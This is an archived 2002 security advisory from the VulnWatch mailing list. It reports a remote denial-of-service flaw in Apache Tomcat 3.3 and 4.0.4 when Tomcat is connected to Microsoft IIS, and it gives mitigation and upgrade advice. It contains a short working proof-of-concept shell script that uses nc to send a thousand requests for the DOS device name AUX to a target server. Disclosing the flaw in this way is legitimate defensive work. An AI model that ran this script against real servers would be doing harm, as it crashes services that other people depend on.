[VulnWatch] Apache Tomcat 3.x and 4.0.x: Remote denial-of-service vulnerability

From: Olaf Schulz (olaf.schulz@t-systems.com)
Date: Fri Oct 11 2002 - 04:36:55 PDT

Next message: Aviram Jenik: "Outlook Express Remote Code Execution in Preview Pane (S/MIME)"

Previous message: Larry W. Cashdollar: "OpenOffice 1.0.1 Race condition during installation."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----

<Title:>
Apache Tomcat: Remote denial-of-service vulnerability

<Date:>
2002-09-06

<State:>
2002-10-11

<Vendor response:>
Vendor contacted on 2002-09-06.
Vendor is verifying the problem since 2002-09-10.
No news since then...

<Operating Systems:>

Microsoft Windows 2000
Microsoft Windows NT may be affected as well.

<Software:>
Apache Tomcat 3.3
Apache Tomcat 4.0.4
All versions prior to 4.1.x may be affected as well.

Apache Tomcat 4.1.10 (and probably higher) is not affected.

<Attack:>
A remote attacker can bring the servlet engine to a standstill.

<Description:>
In combination with Microsoft's IIS, Apache Tomcat is vulnerable to a
denial-of-service attack.
An attacker can crash the tomcat engine with multiple (e.g. 1000)
requests that contain DOS device names like AUX, LPT1, CON, PRN.

Proof of concept code:
When Tomcat is serving servlets and jsp's under /examples/servlet/,
use
:-
- - - - --------8<----------------------------
#!/bin/sh
for i in 1 2 3 4 5 6 7 8 9 0 ; do
  for j in 1 2 3 4 5 6 7 8 9 0 ; do
     for k in 1 2 3 4 5 6 7 8 9 0 ; do
        echo -e "GET /examples/servlet/AUX HTTP/1.0\n\n"|nc
<target_ip>
<target-port> 2>1 >/dev/null &
     done
  done
done
- - - - --------8<----------------------------

This attack works on a Microsoft IIS Web Server connecting the Tomcat
engine via the ajp1.3 connector.
Standalone Tomcat engines (connected via the http interface on port
8080) are not vulnerable.

<Risc:>
Probability of an attack: HIGH
Damage probability: MEDIUM-HIGH


<Recommendation:>
1) Do not use Apache software on Microsoft operating systems.

2) When using Apache with IIS, enable the URLScan Filter to filter
DOS
device names from HTTP Requests.

3) Update to Apache Tomcat 4.1.x

Author: Olaf Schulz
        olaf.schulz@t-systems.com
        http://www.dcert.de

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.3

iQEVAwUBPaanhhAj4oS8JNNNAQGAywgAgbNtMnf54MsqozQsxuJDfR2oU67qUXMf
dMbt7DuyxkRr8sS4+u6vmTvv3v/Da1IfiwlOZcvaRLh+r3+lO1nJUoUZeIVjWW8b
tat0uPKNRxA7b/DJpcQLkohewurDPQlyTV5dJqJpZp6Q8YzRAHIi1WqL4fnZAb6o
fMjIft7MVNs2y/CVpQmofdh4ZTmY0tPdifKIyhxdVBSCpgBES4dZwxX41j9PcHeK
YJpuxm+d6c0PsbbmY5S5BPPBKyg87mQcOHs2bN0JCaxwHoLiXx8zLCQBkhB1xAD7
0y4u8zMXNT5QVqaOeBig+GFackal6b0Qi+8XSDPZRpiJ8kvywz2maQ==
=+2dL
-----END PGP SIGNATURE-----

Next message: Aviram Jenik: "Outlook Express Remote Code Execution in Preview Pane (S/MIME)"
Previous message: Larry W. Cashdollar: "OpenOffice 1.0.1 Race condition during installation."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Oct 11 2002 - 10:03:38 PDT